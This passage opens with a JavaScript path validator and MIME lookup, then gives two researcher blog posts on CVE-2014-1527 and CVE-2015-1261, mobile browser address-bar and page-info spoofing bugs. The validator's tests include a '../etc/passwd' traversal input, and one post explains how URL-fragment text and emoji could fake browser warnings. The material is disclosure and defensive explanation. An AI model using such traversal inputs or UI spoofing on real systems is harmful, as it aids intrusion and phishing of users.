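// Minimal extension-to-MIME lookup; anything unknown falls back to a
// generic binary type
var MIME = {
  html: "text/html", js: "application/javascript", css: "text/css",
  json: "application/json", txt: "text/plain", png: "image/png"
};

// Allow only simple relative paths: word characters, dots, and dashes,
// separated by slashes, with no ".." traversal and no leading slash
function validPath(path) {
  return /^[\w.\-]+(\/[\w.\-]+)*$/.test(path) && path.indexOf("..") === -1;
}

function mimeFor(path) {
  var ext = path.split(".").pop().toLowerCase();
  return MIME[ext] || "application/octet-stream";
}

console.log(validPath("demo/index.html")); // → true
console.log(validPath("../etc/passwd"));   // → false
console.log(mimeFor("style.css"));         // → text/css
```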


More on mobile: Spoofing the address bar with CVE-2014-1527

Continuing with the theme from my previous post, early last year I came across and reported CVE-2014-1527, also known as MFSA 2014-40. An issue affecting the Android version of the Firefox web browser, it made it possible to prevent the address bar from re-emerging after being hidden by a user action such as scrolling. This could have allowed a remote attacker to deploy a full address bar spoof simply using HTML and CSS to construct their own fake version of the browser UI.

And again the cause boiled down to a simple usability feature, a workaround for the perennial problem of too little screen real estate: to save space, most mobile browsers automatically hide the address bar, along with all its security indicators, when it isn't being actively used. Doing something like that properly is tricky.

The really interesting part, though: An almost identical issue also affected Chrome for Android. And it still does. The bug ticket was closed as a WontFix, because, according to the developers, it was like that by design:

The fact that the toolbar is spoofable on mobile has been a conscious decision. The situation isn't going to change unless/until we generally revisit how the mobile toolbar UI works. Although this makes me sad, que será será (for now).

That's right, the address bar in Chrome for Android was consciously designed to be spoofable. A strange design decision if you ask me, but hey, usability first.


CVE-2015-1261 and the state of modern mobile browser UIs

Usability is a notoriously difficult problem on mobile devices. Screen real estate is extremely limited, buttons have to be large to be touch-friendly, there's always a finger or two in the way, and still the user expects a more straightforward experience than on the desktop. Developers also tend to prioritize usability over things like, say, security, which leads to all kinds of interesting problems.

For example, at the moment, it's not possible to view the details of an SSL server certificate in the stable release of Google Chrome for Android. It used to be, sure, but the feature was removed because it wasn't usable. It was replaced with a page info popup that adds nothing you couldn't already see from the omnibox: it simply states the current URL and whether or not Chrome considers the server's SSL certificate valid. Nothing else.

And, because of CVE-2015-1261, it was a bit worse than nothing. Because, well, you could do this:

The screenshot above is from Chrome for Android version 40, showing the page info popup. That's the popup window that opens when you tap on the green lock on an SSL-protected page. And in case it isn't obvious, the entire "warning" part is arbitrary attacker-injected content. Including the icons. Here's what was happening:

Normally, Chrome will encode special characters, like spaces and newlines, if you try to enter them in a URL. They just turn into %20s, %0As, %0Ds, and the like, automatically. There's an exception, though: the fragment part. No extra encoding is done on anything passed in the URL fragment, so it's really easy to mess something up.

Well, in Chrome, they messed it up in the page info popup. The URL was shown as-is and allowed to wrap, and the popup even displayed emoji correctly. That's what the "danger" icons are, emoji. The same annoying little faces you use on WhatsApp. So just by manipulating the URL fragment of the open web page you could inject arbitrary text and icons into a part of the native browser UI. A keen user might be suspicious of the slightly-lighter-than-normal font color, but that's definitely not something to rely on.
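The display-side fix is conceptually simple: escape control characters, and anything else that can masquerade as UI, before rendering an attacker-influenced URL in native chrome. A sketch of the idea, not Chrome's actual patch:

```javascript
// Percent-encode control characters and non-ASCII code points before an
// attacker-influenced URL is drawn in native UI (illustrative only)
function displaySafe(url) {
  return url.replace(/[\u0000-\u001F\u007F-\u{10FFFF}]/gu, function (c) {
    return encodeURIComponent(c);
  });
}

// A newline and a warning-sign character in the fragment come out as
// harmless, visible escapes instead of layout and icons:
console.log(displaySafe("http://example.com/#\n\u26A0 Warning"));
// → http://example.com/#%0A%E2%9A%A0 Warning
```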

I worked with the Chrome developers, and the issue was ultimately fixed in Chrome for Android version 43, which has been out for a while now. The way I see it, though, this was part of a larger, more fundamental issue. The URL of the current page was allowed to wrap, and was not separated clearly enough from genuine browser UI messages, because of the basic usability problems of mobile devices: too little screen real estate and a requirement for an oversimplified user experience.

These are certainly not easy problems to solve (I, for one, have no solutions to offer), but it pays to keep in mind that the compromises often made to work around them have implications for security as well.